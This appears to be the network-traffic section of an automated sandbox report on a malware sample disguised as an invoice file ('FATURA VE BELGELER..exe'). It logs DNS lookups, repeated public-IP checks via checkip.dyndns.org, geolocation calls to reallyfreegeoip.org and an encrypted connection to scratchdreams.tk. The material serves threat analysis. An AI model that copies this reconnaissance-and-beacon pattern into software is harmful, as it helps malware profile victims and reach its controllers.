                                                            May 3, 2024 15:19:00.747028112 CEST49720443192.168.2.5172.67.177.134
                                                            May 3, 2024 15:19:00.747064114 CEST44349720172.67.177.134192.168.2.5
                                                            May 3, 2024 15:19:00.747133017 CEST49720443192.168.2.5172.67.177.134
                                                            May 3, 2024 15:19:00.747425079 CEST49720443192.168.2.5172.67.177.134
                                                            May 3, 2024 15:19:00.747437954 CEST44349720172.67.177.134192.168.2.5
                                                            May 3, 2024 15:19:00.799783945 CEST4971980192.168.2.5132.226.247.73
                                                            May 3, 2024 15:19:00.940258980 CEST44349720172.67.177.134192.168.2.5
                                                            May 3, 2024 15:19:00.941989899 CEST49720443192.168.2.5172.67.177.134
                                                            May 3, 2024 15:19:00.942008972 CEST44349720172.67.177.134192.168.2.5
                                                            May 3, 2024 15:19:01.173923016 CEST44349720172.67.177.134192.168.2.5
                                                            May 3, 2024 15:19:01.174242020 CEST44349720172.67.177.134192.168.2.5
                                                            May 3, 2024 15:19:01.174340010 CEST49720443192.168.2.5172.67.177.134
                                                            May 3, 2024 15:19:01.174840927 CEST49720443192.168.2.5172.67.177.134
                                                            May 3, 2024 15:19:01.178426027 CEST4971980192.168.2.5132.226.247.73
                                                            May 3, 2024 15:19:01.179537058 CEST4972180192.168.2.5132.226.247.73
                                                            May 3, 2024 15:19:01.376758099 CEST8049721132.226.247.73192.168.2.5
                                                            May 3, 2024 15:19:01.376785040 CEST8049719132.226.247.73192.168.2.5
                                                            May 3, 2024 15:19:01.376940012 CEST4971980192.168.2.5132.226.247.73
                                                            May 3, 2024 15:19:01.377126932 CEST4972180192.168.2.5132.226.247.73
                                                            May 3, 2024 15:19:01.377126932 CEST4972180192.168.2.5132.226.247.73
                                                            May 3, 2024 15:19:01.572630882 CEST8049721132.226.247.73192.168.2.5
                                                            May 3, 2024 15:19:01.573478937 CEST8049721132.226.247.73192.168.2.5
                                                            May 3, 2024 15:19:01.574723959 CEST49722443192.168.2.5172.67.177.134
                                                            May 3, 2024 15:19:01.574759007 CEST44349722172.67.177.134192.168.2.5
                                                            May 3, 2024 15:19:01.574851990 CEST49722443192.168.2.5172.67.177.134
                                                            May 3, 2024 15:19:01.575093031 CEST49722443192.168.2.5172.67.177.134
                                                            May 3, 2024 15:19:01.575105906 CEST44349722172.67.177.134192.168.2.5
                                                            May 3, 2024 15:19:01.627882004 CEST4972180192.168.2.5132.226.247.73
                                                            May 3, 2024 15:19:01.757924080 CEST44349722172.67.177.134192.168.2.5
                                                            May 3, 2024 15:19:01.759480953 CEST49722443192.168.2.5172.67.177.134
                                                            May 3, 2024 15:19:01.759500027 CEST44349722172.67.177.134192.168.2.5
                                                            May 3, 2024 15:19:01.987322092 CEST44349722172.67.177.134192.168.2.5
                                                            May 3, 2024 15:19:01.987423897 CEST44349722172.67.177.134192.168.2.5
                                                            May 3, 2024 15:19:01.987478971 CEST49722443192.168.2.5172.67.177.134
                                                            May 3, 2024 15:19:01.988044024 CEST49722443192.168.2.5172.67.177.134
                                                            May 3, 2024 15:19:01.991883993 CEST4972180192.168.2.5132.226.247.73
                                                            May 3, 2024 15:19:01.993096113 CEST4972380192.168.2.5132.226.247.73
                                                            May 3, 2024 15:19:02.187486887 CEST8049721132.226.247.73192.168.2.5
                                                            May 3, 2024 15:19:02.187581062 CEST4972180192.168.2.5132.226.247.73
                                                            May 3, 2024 15:19:02.188630104 CEST8049723132.226.247.73192.168.2.5
                                                            May 3, 2024 15:19:02.188709021 CEST4972380192.168.2.5132.226.247.73
                                                            May 3, 2024 15:19:02.188992023 CEST4972380192.168.2.5132.226.247.73
                                                            May 3, 2024 15:19:02.384521008 CEST8049723132.226.247.73192.168.2.5
                                                            May 3, 2024 15:19:02.385395050 CEST8049723132.226.247.73192.168.2.5
                                                            May 3, 2024 15:19:02.387181044 CEST49724443192.168.2.5172.67.177.134
                                                            May 3, 2024 15:19:02.387214899 CEST44349724172.67.177.134192.168.2.5
                                                            May 3, 2024 15:19:02.387309074 CEST49724443192.168.2.5172.67.177.134
                                                            May 3, 2024 15:19:02.387600899 CEST49724443192.168.2.5172.67.177.134
                                                            May 3, 2024 15:19:02.387609959 CEST44349724172.67.177.134192.168.2.5
                                                            May 3, 2024 15:19:02.440399885 CEST4972380192.168.2.5132.226.247.73
                                                            May 3, 2024 15:19:02.574199915 CEST44349724172.67.177.134192.168.2.5
                                                            May 3, 2024 15:19:02.576715946 CEST49724443192.168.2.5172.67.177.134
                                                            May 3, 2024 15:19:02.576740026 CEST44349724172.67.177.134192.168.2.5
                                                            May 3, 2024 15:19:02.808295965 CEST44349724172.67.177.134192.168.2.5
                                                            May 3, 2024 15:19:02.808423042 CEST44349724172.67.177.134192.168.2.5
                                                            May 3, 2024 15:19:02.808501959 CEST49724443192.168.2.5172.67.177.134
                                                            May 3, 2024 15:19:02.929044008 CEST49724443192.168.2.5172.67.177.134
                                                            May 3, 2024 15:19:03.972734928 CEST4972380192.168.2.5132.226.247.73
                                                            May 3, 2024 15:19:04.114312887 CEST49725443192.168.2.5104.21.27.85
                                                            May 3, 2024 15:19:04.114342928 CEST44349725104.21.27.85192.168.2.5
                                                            May 3, 2024 15:19:04.114412069 CEST49725443192.168.2.5104.21.27.85
                                                            May 3, 2024 15:19:04.114833117 CEST49725443192.168.2.5104.21.27.85
                                                            May 3, 2024 15:19:04.114845991 CEST44349725104.21.27.85192.168.2.5
                                                            May 3, 2024 15:19:04.168575048 CEST8049723132.226.247.73192.168.2.5
                                                            May 3, 2024 15:19:04.168673992 CEST4972380192.168.2.5132.226.247.73
                                                            May 3, 2024 15:19:04.307707071 CEST44349725104.21.27.85192.168.2.5
                                                            May 3, 2024 15:19:04.307862997 CEST49725443192.168.2.5104.21.27.85
                                                            May 3, 2024 15:19:04.318070889 CEST49725443192.168.2.5104.21.27.85
                                                            May 3, 2024 15:19:04.318085909 CEST44349725104.21.27.85192.168.2.5
                                                            May 3, 2024 15:19:04.318332911 CEST44349725104.21.27.85192.168.2.5
                                                            May 3, 2024 15:19:04.319962025 CEST49725443192.168.2.5104.21.27.85
                                                            May 3, 2024 15:19:04.360120058 CEST44349725104.21.27.85192.168.2.5
                                                            May 3, 2024 15:19:43.518887043 CEST44349725104.21.27.85192.168.2.5
                                                            May 3, 2024 15:19:43.518965006 CEST44349725104.21.27.85192.168.2.5
                                                            May 3, 2024 15:19:43.519365072 CEST49725443192.168.2.5104.21.27.85
                                                            May 3, 2024 15:19:43.523286104 CEST49725443192.168.2.5104.21.27.85
                                                            May 3, 2024 15:20:02.195890903 CEST8049711132.226.247.73192.168.2.5
                                                            May 3, 2024 15:20:02.195944071 CEST4971180192.168.2.5132.226.247.73
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            May 3, 2024 15:18:52.727739096 CEST6017453192.168.2.51.1.1.1
                                                            May 3, 2024 15:18:52.816323996 CEST53601741.1.1.1192.168.2.5
                                                            May 3, 2024 15:18:55.020256996 CEST5578753192.168.2.51.1.1.1
                                                            May 3, 2024 15:18:55.120155096 CEST53557871.1.1.1192.168.2.5
                                                            May 3, 2024 15:19:03.972645998 CEST5276853192.168.2.51.1.1.1
                                                            May 3, 2024 15:19:04.113651037 CEST53527681.1.1.1192.168.2.5
                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            May 3, 2024 15:18:52.727739096 CEST192.168.2.51.1.1.10xf6e3Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                            May 3, 2024 15:18:55.020256996 CEST192.168.2.51.1.1.10xaa6fStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                            May 3, 2024 15:19:03.972645998 CEST192.168.2.51.1.1.10x4ca4Standard query (0)scratchdreams.tkA (IP address)IN (0x0001)false
                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            May 3, 2024 15:18:52.816323996 CEST1.1.1.1192.168.2.50xf6e3No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                            May 3, 2024 15:18:52.816323996 CEST1.1.1.1192.168.2.50xf6e3No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                            May 3, 2024 15:18:52.816323996 CEST1.1.1.1192.168.2.50xf6e3No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                            May 3, 2024 15:18:52.816323996 CEST1.1.1.1192.168.2.50xf6e3No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                            May 3, 2024 15:18:52.816323996 CEST1.1.1.1192.168.2.50xf6e3No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                            May 3, 2024 15:18:52.816323996 CEST1.1.1.1192.168.2.50xf6e3No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                            May 3, 2024 15:18:55.120155096 CEST1.1.1.1192.168.2.50xaa6fNo error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                            May 3, 2024 15:18:55.120155096 CEST1.1.1.1192.168.2.50xaa6fNo error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                            May 3, 2024 15:19:04.113651037 CEST1.1.1.1192.168.2.50x4ca4No error (0)scratchdreams.tk104.21.27.85A (IP address)IN (0x0001)false
                                                            May 3, 2024 15:19:04.113651037 CEST1.1.1.1192.168.2.50x4ca4No error (0)scratchdreams.tk172.67.169.18A (IP address)IN (0x0001)false
                                                            • reallyfreegeoip.org
                                                            • scratchdreams.tk
                                                            • checkip.dyndns.org
                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.549707132.226.247.73806368C:\Users\user\Desktop\FATURA VE BELGELER..exe
                                                            TimestampBytes transferredDirectionData
                                                            May 3, 2024 15:18:53.022008896 CEST151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            May 3, 2024 15:18:53.218297005 CEST323INHTTP/1.1 200 OK
                                                            Date: Fri, 03 May 2024 13:18:53 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 8193ea51b7c4ff7f19eaa75ea9e90523
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.227.219</body></html>
                                                            May 3, 2024 15:18:54.784085989 CEST127OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            May 3, 2024 15:18:54.980263948 CEST323INHTTP/1.1 200 OK
                                                            Date: Fri, 03 May 2024 13:18:54 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: bb8de16fd2cd6c916ae13bf590137a1a
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.227.219</body></html>
                                                            May 3, 2024 15:18:56.165414095 CEST127OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            May 3, 2024 15:18:56.364867926 CEST323INHTTP/1.1 200 OK
                                                            Date: Fri, 03 May 2024 13:18:56 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 95fa250137e079c589abf7e8fa9277f5
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.227.219</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.549711132.226.247.73806368C:\Users\user\Desktop\FATURA VE BELGELER..exe
                                                            TimestampBytes transferredDirectionData
                                                            May 3, 2024 15:18:56.986133099 CEST127OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            May 3, 2024 15:18:57.182941914 CEST323INHTTP/1.1 200 OK
                                                            Date: Fri, 03 May 2024 13:18:57 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 45399002aef10569bdef0acf5d0d5ee6
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.227.219</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.549715132.226.247.73806368C:\Users\user\Desktop\FATURA VE BELGELER..exe
                                                            TimestampBytes transferredDirectionData
                                                            May 3, 2024 15:18:57.807873964 CEST151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            May 3, 2024 15:18:58.004662991 CEST323INHTTP/1.1 200 OK
                                                            Date: Fri, 03 May 2024 13:18:57 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: bac3290e3b47e1fafb35f3d531444320
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.227.219</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.549717132.226.247.73806368C:\Users\user\Desktop\FATURA VE BELGELER..exe
                                                            TimestampBytes transferredDirectionData
                                                            May 3, 2024 15:18:59.622492075 CEST151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            May 3, 2024 15:18:59.819750071 CEST323INHTTP/1.1 200 OK
                                                            Date: Fri, 03 May 2024 13:18:59 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 8146b6e5c515202fae1dc861124cd90d
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.227.219</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.549719132.226.247.73806368C:\Users\user\Desktop\FATURA VE BELGELER..exe
                                                            TimestampBytes transferredDirectionData
                                                            May 3, 2024 15:19:00.548125982 CEST151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            May 3, 2024 15:19:00.745521069 CEST323INHTTP/1.1 200 OK
                                                            Date: Fri, 03 May 2024 13:19:00 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 635a8808da6f0c19cb48aecc91b2e3f3
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.227.219</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.549721132.226.247.73806368C:\Users\user\Desktop\FATURA VE BELGELER..exe
                                                            TimestampBytes transferredDirectionData
                                                            May 3, 2024 15:19:01.377126932 CEST151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            May 3, 2024 15:19:01.573478937 CEST323INHTTP/1.1 200 OK
                                                            Date: Fri, 03 May 2024 13:19:01 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 167a9b2fcfe17697bbbd2e138662bd5e
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.227.219</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.549723132.226.247.73806368C:\Users\user\Desktop\FATURA VE BELGELER..exe
                                                            TimestampBytes transferredDirectionData
                                                            May 3, 2024 15:19:02.188992023 CEST151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            May 3, 2024 15:19:02.385395050 CEST323INHTTP/1.1 200 OK
                                                            Date: Fri, 03 May 2024 13:19:02 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 1a32cc3d80f490d46d5a46c0670505a8
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.227.219</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.549709172.67.177.1344436368C:\Users\user\Desktop\FATURA VE BELGELER..exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-03 13:18:55 UTC87OUTGET /xml/191.96.227.219 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-05-03 13:18:56 UTC693INHTTP/1.1 200 OK
                                                            Date: Fri, 03 May 2024 13:18:56 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: MISS
                                                            Last-Modified: Fri, 03 May 2024 13:18:56 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B9ViBUHUk3U8AH9q9H56Xiq7%2BOSDIRTisb2kMkANS5UOewfWjr5flNU4P5jjkYpjp6pNwj49L0xns1t900hBIbrtpQb8uphZVyyGrvelOfgnFFSDtGW9uywN2UNJ9JMyzDJawsQ9"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 87e08a2e9f1b4276-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-05-03 13:18:56 UTC369INData Raw: 31 36 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 41 5a 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 41 72 69 7a 6f 6e 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 50 68 6f 65 6e 69 78 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 38 35 30 30 34 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 50 68 6f 65 6e 69 78 3c 2f 54 69
                                                            Data Ascii: 16a<Response><IP>191.96.227.219</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>AZ</RegionCode><RegionName>Arizona</RegionName><City>Phoenix</City><ZipCode>85004</ZipCode><TimeZone>America/Phoenix</Ti
                                                            2024-05-03 13:18:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.549710172.67.177.1344436368C:\Users\user\Desktop\FATURA VE BELGELER..exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-03 13:18:56 UTC63OUTGET /xml/191.96.227.219 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            2024-05-03 13:18:56 UTC706INHTTP/1.1 200 OK
                                                            Date: Fri, 03 May 2024 13:18:56 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 0
                                                            Last-Modified: Fri, 03 May 2024 13:18:56 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nlzILZaEUx%2BX6IH2fkImVdb98HndDv6aLEq%2BqzUFDUG2ldl9CBZeZqLHiXXvLBiytPPZhIDPNCRZUzhdPAHXhoc%2Bvj6GGMZems%2FPUdMl3GyNhzLGy8d8ipIEvnNKp9Rz4YZQ%2FvMw"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 87e08a348d638c57-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-05-03 13:18:56 UTC369INData Raw: 31 36 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 41 5a 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 41 72 69 7a 6f 6e 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 50 68 6f 65 6e 69 78 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 38 35 30 30 34 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 50 68 6f 65 6e 69 78 3c 2f 54 69
                                                            Data Ascii: 16a<Response><IP>191.96.227.219</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>AZ</RegionCode><RegionName>Arizona</RegionName><City>Phoenix</City><ZipCode>85004</ZipCode><TimeZone>America/Phoenix</Ti
                                                            2024-05-03 13:18:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.549713172.67.177.1344436368C:\Users\user\Desktop\FATURA VE BELGELER..exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-03 13:18:57 UTC87OUTGET /xml/191.96.227.219 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-05-03 13:18:57 UTC706INHTTP/1.1 200 OK
                                                            Date: Fri, 03 May 2024 13:18:57 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 1
                                                            Last-Modified: Fri, 03 May 2024 13:18:56 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4Qtkms5SHASzez0WVJ10VNEoV1BlKrHZhfinEpAajp7S5ctQjeFSOoN0JSWGBJuYfVtiD%2F%2BpzZTdtsjx4aar4P6aFOTvE7r47RSzVYsSOEHqH2dlWqJd%2BvJYpS%2FWTpCSR4%2BLN9qa"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 87e08a39af4f425d-EWR
                                                            alt-svc: h3=":443"; ma=86400
